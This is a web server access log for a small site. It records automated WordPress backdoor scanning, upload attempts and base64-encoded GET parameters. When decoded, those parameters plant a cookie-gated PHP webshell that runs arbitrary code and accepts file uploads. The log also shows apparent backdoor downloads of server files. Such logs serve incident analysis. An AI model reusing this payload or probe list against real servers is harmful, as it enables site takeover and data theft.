4.189.120.86 - - [07/Dec/2025:17:10:08 +0000] "GET /wp-includes/customize/chosen.php HTTP/1.1" 404 1251 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
4.189.120.86 - - [07/Dec/2025:17:10:09 +0000] "GET /wp-includes/index.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
4.189.120.86 - - [07/Dec/2025:17:10:09 +0000] "GET /wp-includes/js/codemirror/index.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
4.189.120.86 - - [07/Dec/2025:17:10:09 +0000] "GET /wp-includes/js/jquery/jquery.php HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:09 +0000] "GET /wp-includes/random_compat/index.php HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
4.189.120.86 - - [07/Dec/2025:17:10:09 +0000] "GET /wp-includes/rest-api/index.php HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:09 +0000] "GET /wp-includes/sitemaps/providers/index.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:09 +0000] "GET /wp-includes/style-engine/wp-conflg.php HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:10 +0000] "GET /wp-admin/ HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:10 +0000] "GET /wp-admin/css/ HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:10 +0000] "GET /wp-admin/includes/index.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:10 +0000] "GET /wp-admin/network/admin.php HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
4.189.120.86 - - [07/Dec/2025:17:10:10 +0000] "GET /wp-content/classwithtostring.php HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:10 +0000] "GET /wp-content/languages/index.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
4.189.120.86 - - [07/Dec/2025:17:10:10 +0000] "GET /wp-content/plugins/admin.php HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:11 +0000] "GET /wp-content/themes/admin.php HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 11; 21081111RG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:11 +0000] "GET /wp-content/uploads/2023/ HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
4.189.120.86 - - [07/Dec/2025:17:10:11 +0000] "GET /wp-content/uploads/2024/ HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:11 +0000] "GET /wp-content/uploads/2025/ HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
4.189.120.86 - - [07/Dec/2025:17:10:11 +0000] "GET /wp-editor.php HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
4.189.120.86 - - [07/Dec/2025:17:10:11 +0000] "GET /wp-includes/ID3/ HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:11 +0000] "GET /wp-includes/ID3/simi.php HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:12 +0000] "GET /wp-includes/IXR/ HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:12 +0000] "GET /wp-includes/Requests/about.php HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:12 +0000] "GET /wp-includes/Text/xwx1.php HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:12 +0000] "GET /wp-includes/assets/about.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
4.189.120.86 - - [07/Dec/2025:17:10:12 +0000] "GET /wp-includes/assets/index.php HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
4.189.120.86 - - [07/Dec/2025:17:10:12 +0000] "GET /wp-includes/block-patterns/ HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
4.189.120.86 - - [07/Dec/2025:17:10:12 +0000] "GET /wp-includes/blocks/ HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:13 +0000] "GET /wp-includes/blocks/calendar/index.php HTTP/1.1" 404 1251 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:13 +0000] "GET /wp-includes/certificates/ HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
4.189.120.86 - - [07/Dec/2025:17:10:13 +0000] "GET /wp-includes/css/index.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:13 +0000] "GET /wp-includes/customize/index.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:13 +0000] "GET /wp-includes/fonts/admin.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
4.189.120.86 - - [07/Dec/2025:17:10:13 +0000] "GET /wp-includes/html-api/index.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:13 +0000] "GET /wp-includes/images/media/ HTTP/1.1" 404 1251 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
4.189.120.86 - - [07/Dec/2025:17:10:14 +0000] "GET /wp-includes/images/smilies/about.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:14 +0000] "GET /wp-includes/js/index.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:14 +0000] "GET /wp-includes/rest-api/ HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:14 +0000] "GET /wp-includes/rest-api/fields/ HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:14 +0000] "GET /wp-includes/rest-api/search/index.php HTTP/1.1" 404 1251 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:14 +0000] "GET /wp-includes/sitemaps/ HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
4.189.120.86 - - [07/Dec/2025:17:10:14 +0000] "GET /wp-includes/sitemaps/wp-conflg.php HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:15 +0000] "GET /wp-themes.php HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
4.189.120.86 - - [07/Dec/2025:17:10:15 +0000] "GET /x.php HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
4.189.120.86 - - [07/Dec/2025:17:10:15 +0000] "GET /yas.php HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
192.121.16.196 - - [07/Dec/2025:17:00:23 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2775.67 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:17:00:23 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2775.67 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:17:00:43 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2775.67 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:17:00:43 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2775.67 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:17:09:03 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
66.249.64.109 - - [07/Dec/2025:17:16:02 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
37.112.223.135 - - [07/Dec/2025:17:18:55 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2815.63 Safari/537.36"
144.76.19.70 - - [07/Dec/2025:17:21:31 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)"
144.76.19.70 - - [07/Dec/2025:17:21:31 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)"
37.112.223.135 - - [07/Dec/2025:17:28:22 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0"
37.112.223.135 - - [07/Dec/2025:17:28:24 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0"
37.112.223.135 - - [07/Dec/2025:17:28:41 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0"
192.121.16.196 - - [07/Dec/2025:17:38:10 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.3; Trident/5.0)"
192.121.16.196 - - [07/Dec/2025:17:38:36 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.3; Trident/5.0)"
194.68.32.135 - - [07/Dec/2025:17:09:10 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0"
66.249.64.110 - - [07/Dec/2025:17:16:02 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9hd3N0YXRzMTEyMDIyLm1ldGFsZXNjcm9zZS5jb20udHh0 HTTP/1.1" 200 6466 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
37.112.223.135 - - [07/Dec/2025:17:18:53 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2815.63 Safari/537.36"
37.112.223.135 - - [07/Dec/2025:17:18:53 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2815.63 Safari/537.36"
37.112.223.135 - - [07/Dec/2025:17:19:09 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2815.63 Safari/537.36"
37.112.223.135 - - [07/Dec/2025:17:28:29 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0"
66.249.64.108 - - [07/Dec/2025:17:33:36 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9tYWlsL21ldGFsZXNjcm9zZS5jb20vY29udGFjdC9kb3ZlY290Lmxpc3QuaW5kZXgubG9n HTTP/1.1" 200 310 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
192.121.16.196 - - [07/Dec/2025:17:38:35 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.3; Trident/5.0)"
194.68.32.135 - - [07/Dec/2025:17:47:07 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2867.8 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:17:47:09 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2867.8 Safari/537.36"
37.112.223.135 - - [07/Dec/2025:17:18:22 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2815.63 Safari/537.36"
37.112.223.135 - - [07/Dec/2025:17:18:54 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2815.63 Safari/537.36"
37.112.223.135 - - [07/Dec/2025:17:28:41 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0"
37.112.223.135 - - [07/Dec/2025:17:28:42 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0"
192.121.16.196 - - [07/Dec/2025:17:38:34 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.3; Trident/5.0)"
192.121.16.196 - - [07/Dec/2025:17:38:34 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.3; Trident/5.0)"
